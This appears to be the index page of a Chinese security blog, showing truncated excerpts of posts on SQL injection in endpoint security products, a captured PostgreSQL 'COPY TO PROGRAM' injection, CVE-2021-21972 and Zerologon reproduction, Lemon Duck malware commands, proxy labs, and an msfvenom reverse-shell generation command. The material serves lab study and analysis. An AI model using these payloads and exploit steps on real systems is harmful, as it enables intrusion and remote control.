金山终端安全系统V9安全问题
SQL注入文件inter/update_software_info.php
<?php//客户端显示数据require_once "./use_db.php";require_once "./common/functions.php";$return=array();$return["nResult"] =0;$where='where 1=1';if (!is_null($_POST['type']) and $_POST['type'] !="") { $id=$_POST['type']; $where .=" and type=$id ";}if (!is_null($_POST['key'])) { $keyname=$_POST['key']; $where .=" and keyname ...
金山V8+多个漏洞
SQL注入inter/handler_get_set_data/set_sc_count_online_setup_data_cmd.php
函数set_sc_count_online_setup_data_cmd
function set_sc_count_online_setup_data_cmd($para) { global $logHandler, $mysqlDB;// $logHandler->LogError('set_sc_count_online_setup_data_cmd'); $keyData = array("client","server","scid"); $check = checkParam($keyData,$para,$logHandler); if ($check !== true) return false; $SCID= $para['scid']; $data_type=' ...
浪潮ClusterEngine登录控制缺陷
65b2ab065baa4f1fe9b18bbe6716b06b60f085f2ceb95b768b2676a5d18106cbf8597dc35c4b10d4bb190ab1315dfb43dbfe73635eb99201ab19ecbb08362adb434c74afc86f6c486432d33038195e85c263df49432f3871005f6424a04f88027f2132a343e7b524348282ff3e76b08c68c6bf0b6dde8ab02a2a098691f07610e2de778c7e0fc19c29b9e5fbdf4b53b60d8c639b2451c4fe93ca6a5527deb3d0ba2dd51eda8eb394e1ba058bd54d7015fd82cb5b9adc47e0961031ab5fa89a717e2f9d4e5ff39e79936fdaee5503e4365ae9150aa58c2a29eab568efc2644a44d4025c3da2bb0c04ae86225cc322809a09883748534d5a4e5 ...
天擎部分漏洞
在某大型活动中捕获到了天擎(QAX Skylar)的几个0day,跟代码审了下
0x01 第一类活动期间在WAF上拦截到一枚注入,数据包如下
POST /api/upload_client_conf.json?mid=马赛克 HTTP/1.1Host: 马赛克User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Length: 128Content-Type: application/json{"summary": {"0": {"nickname": "cpu='1';CopY(sElEct 1)TO pRogRAM 'e ...
CVE-2021-21972 复现和分析
0x01 背景vSphere是VMware推出的虚拟化平台套件,包含ESXi、vCenter Server等一系列的软件。其中vCenter Server为 ESXi的控制中心,可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机,使得IT管理员能够提高控制能力,简化入场任务,并降低IT环境的管理复杂性与成本。
vSphere Client(HTML5)在vCenter Server插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放443端口的服务器向vCenter Server发送精心构造的请求,从而在服务器上写入webshell,最终造成远程任意代码执行。
0x02 代码分析vCenter Server的vROPS插件的API未经过鉴权,存在一些敏感接口。其中 uploadova 接口存在一个上传 OVA 文件的功能:
@RequestMapping( value = {"/uploadova"}, method = {RequestMethod.POST})public void uploadO ...
柠檬鸭组织样本分析
起因
分析1.txt文本内容如下
cmd /c echo RmMrcM >> c:\windows\temp\msInstall.exe&echo copy /y c:\windows\temp\msInstall.exe c:\windows\kNnk.exe>c:/windows/temp/p.bat&echo "*" >c:\windows\temp\eb.txt&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.b ...
多级代理实验
内网渗透中经常碰到多个网段的机器不出网的情况,做一套试验环境来练习下多级代理
环境介绍以下环境均在VM16中搭建
LEDE x2.36 软路由 *1
网络:可出网,边界,IP 172.16.17.100
虚拟机配置:2C 4G 4网卡
Windows server 2019 *1
网络:可出网,DMZ,WEB机,IP 172.16.18.2
虚拟机配置:2C 2G 1网卡
Windows server 2016 *1
网络:不可出网,DMZ,IP 10.100.100.2
虚拟机配置:2C 2G 1网卡
Windows server 2008 R2*1
网络:不可出网,DMZ,IP 192.168.37.1
虚拟机配置:2C 2G 1网卡
Win10 *1
网络:通Win2019
虚机配置:4C8G 1网卡
拓扑图
攻击机配置
Win10
kali (parrot亦可)
过程LEDE配置安装好LEDE后配置接口如下
配置后状态如图
防火墙配置如下
DMZ规则
DMZ_WAN规则
端口转发规则LEDE防火墙新建端口转发规则
测试连通性3台 ...
NPS弱口令之殇
NPS作为一款轻量级、高性能、功能强大的内网穿透代理服务器。并且支持多种协议的转发从而被广泛使用,借助网络空间搜索引擎2020年11月26日的结果,全球范围内共5,582个主机为NPS代理服务器。
目录解析以NPS 0.26.9版本为例,目录结构及含义如下
│ nps│ ├───conf //配置目录│ clients.json //客户端数据文件 │ hosts.json //主机数据文件│ nps.conf //配置文件│ server.key //私钥│ server.pem //证书│ tasks.json //任务数据文件│ └───web //网站目录 ├───static //静态资源目录 │ ├───css │ │ bootstrap-table.min.css │ │ bootstrap.min.css │ │ datatables.css │ │ fontawesome.m ...
cobaltstrike插件CrossC2踩坑记录
前言CrossC2面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。
使用直接下载https://github.com/gloxec/CrossC2/releases 中的最新版即可,导入CNA后即可使用
4.0需要下载4.0分支
4.1需要下载4.1分支
踩坑由于本机是win10,会出现以下2个问题:
1、丢失ucrtbased.dll问题在直接运行genCrossC2.Win.exe时会报错,丢失丢失ucrtbased.dll。
解决方案:安装VS2017或VS2019即可解决,文章后面会提供32位的dll下载,下载后移入C:\Windows\System32即可使用
2、windows下无法通过CNA中生成Linux beacon这个坑浪费了一下午去解决,直接丢解决过程
定位问题cna插件中的第3、4行需要替换为相应的路径
第115行的 $dialog = dialog("CrossC2 Payload Generator& ...
内存取证工具Volatility使用
记录下Volatility使用过程
环境
Parrot *1
Windows 2008*1
先生成个msf马子
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.17.6 LPORT=4444 -a x64 -f exe -o /home/parrot/Desktop/1.exe
拷到Windows2008机器上运行后迁移进程
然后使用dumpit对内存做完整镜像
做好后的镜像大小取决于机器内存的大小,机器内存越大,镜像后的文件越大
拷回parrot,开始分析
分析命令如下
volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind查找疑似被注入的进程,这里应该先执行volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw imageinfo来确定使用配置文件的
┌─[root@p ...
PHP ioncube V10.X解密
背景项目中碰到个用ionCube V10加密的源码,需要解密做审计,记录下踩的坑
文件数量2000多,找了一番网站发现https://easytoyou.eu/可以提供解密服务,
BTW,这个站一次只能上传一个文件,手动点2000多次不说累死也得烦死
过程按照惯例,先注册个号看看有什么功能
好嘛 10欧元30天会员,冲了再看看解密面板
面板变了,上传个加密的文件抓个包看看
解密完成后在页面中回显下载链接,那么就可以写脚本批量跑了。
思路脚本需要实现的功能是遍历所有指定格式的文件,保存获取到的列表,上传解密,下载解密后的文件
直接贴代码
遍历符合格式的文件代码# Load Foldersdef get_all_path(self): if os.path.exists(self.FileList): pass else: postfix = set(['php']) # 设置要记录的文件格式 for maindir, subdir, file_name_list in os.walk(self.dstF ...
林级域环境下复现CVE-2020-1472
环境
域林环境
根DC:10.100.100.100(server2019)
一级林DC:10.100.100.101(server2016)
二级林DC:10.100.100.102(server2012R2)
跳板机(攻击机):10.100.100.105(WIN10)
简要拓扑
过程
利用过程:将域控机器账户密码设置为空->读取域管hash->读取sam文件hash(ntds.dit)->恢复域控机器账户密码
攻击首先安装impacket:
git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpip install -r requirements.txtpython setup.py install
然后下载利用脚本
git clone https://github.com/dirkjanm/CVE-2020-1472cd CVE-2020-1472
直接拿根域测,执行
python cve-2020-1472-exploit.py AD 10.100.100.100
...